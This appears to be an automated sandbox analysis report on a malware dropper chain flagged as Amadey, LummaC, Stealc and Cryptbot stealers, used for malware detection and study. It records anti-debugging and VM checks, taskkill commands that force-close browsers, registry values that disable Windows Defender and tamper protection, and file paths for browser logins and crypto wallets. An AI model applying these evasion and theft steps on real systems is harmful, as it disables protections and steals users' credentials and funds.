Source: 80c14d0add.exe, 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware 4
Source: 80c14d0add.exe, 00000019.00000002.2835040452.0000000000D39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.000000000084E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWz
Source: 80c14d0add.exe, 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=
Source: 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000125D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: firefox.exe, 00000018.00000002.2955186116.000001DE75BE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2826608549.00000175A8620000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000002.2665386780.000000000121A000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000009.00000002.2661265680.0000000000826000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.000000000084E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2955186116.000001DE75BE0000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825165898.00000213320CA000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000122F000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000021.00000002.2967076596.000000000125D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 80c14d0add.exe, 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000018.00000003.2733518738.000001DE7F8C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2957595100.000001DE7F8A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2829090326.0000021332515000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 80c14d0add.exe, 00000009.00000002.2661265680.00000000007F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: firefox.exe, 0000001B.00000002.2829826183.0000021332607000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcz
Source: firefox.exe, 0000001B.00000002.2829826183.0000021332607000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6M
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.000000000081F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx@
Source: firefox.exe, 0000001C.00000002.2822545062.00000175A7DAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPhb
Source: file.exe, 00000000.00000002.1727498803.0000000001149000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1757170082.0000000000709000.00000040.00000001.01000000.00000007.sdmp, Lumma55.exe, 00000006.00000002.2660821072.000000000094F000.00000040.00000001.01000000.00000009.sdmp, 80c14d0add.exe, 00000009.00000002.2664164929.0000000001290000.00000040.00000001.01000000.0000000B.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2968067630.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, 80c14d0add.exe, 00000019.00000002.2836982350.0000000001290000.00000040.00000001.01000000.0000000B.sdmp, 3f81b82714.exe, 0000001D.00000001.2783091362.000000000028A000.00000080.00000001.01000000.00000014.sdmp, 8e3ce0163b.exe, 00000021.00000002.2964342181.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, d199ee6df3.exe, 00000022.00000002.2967919469.00000000008A8000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001B.00000002.2829826183.0000021332607000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2826608549.00000175A8620000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05230C04 rdtsc 0_2_05230C04
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 3548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 2324, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe "C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe "C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe "C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe "C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe "C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: 67baab2438.exe, 0000000B.00000000.2685000427.0000000000102000.00000002.00000001.01000000.0000000C.sdmp, 67baab2438.exe, 0000001E.00000000.2813742419.0000000000102000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 80c14d0add.exe Binary or memory string: EProgram Manager
Source: file.exe, file.exe, 00000000.00000002.1727498803.0000000001149000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1757170082.0000000000709000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: Lumma55.exe, Lumma55.exe, 00000006.00000002.2660821072.000000000094F000.00000040.00000001.01000000.00000009.sdmp, 80c14d0add.exe, 00000009.00000002.2664164929.0000000001290000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: EProgram Manager
Source: firefox.exe, 00000018.00000002.2824733163.0000002FB6FFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 8e3ce0163b.exe, 0000000A.00000002.2968067630.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, 8e3ce0163b.exe, 00000021.00000002.2964342181.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: oqsO&Program Manager
Source: 8e3ce0163b.exe, 8e3ce0163b.exe, 0000000A.00000002.2968067630.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, 8e3ce0163b.exe, 00000021.00000002.2964342181.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: qsO&Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: Lumma55.exe, 00000006.00000003.2609113037.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2612894408.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2609529663.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2609419629.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2647564315.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2692062277.0000000001352000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2692211429.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2692285290.0000000001354000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.skotes.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1716893441.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1685132156.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1727424828.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2312466053.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1757093897.0000000000521000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000B.00000003.2753075024.000000000188F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2965543678.0000000001888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 67baab2438.exe PID: 8160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 67baab2438.exe PID: 2812, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: Lumma55.exe PID: 7372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 8052, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000019.00000002.2836132086.0000000000EB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2746461247.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2662804709.0000000000EB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2617805779.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 3548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 2324, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Lumma55.exe, 00000006.00000003.2502644685.00000000012B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\walletsd
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: Lumma55.exe, 00000006.00000003.2581263074.00000000012C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: 8e3ce0163b.exe, 0000000A.00000003.2804105277.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Lumma55.exe, 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: 8e3ce0163b.exe, 0000000A.00000003.2804105277.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: Lumma55.exe, 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Lumma55.exe, 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Lumma55.exe, 00000006.00000003.2502644685.00000000012B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
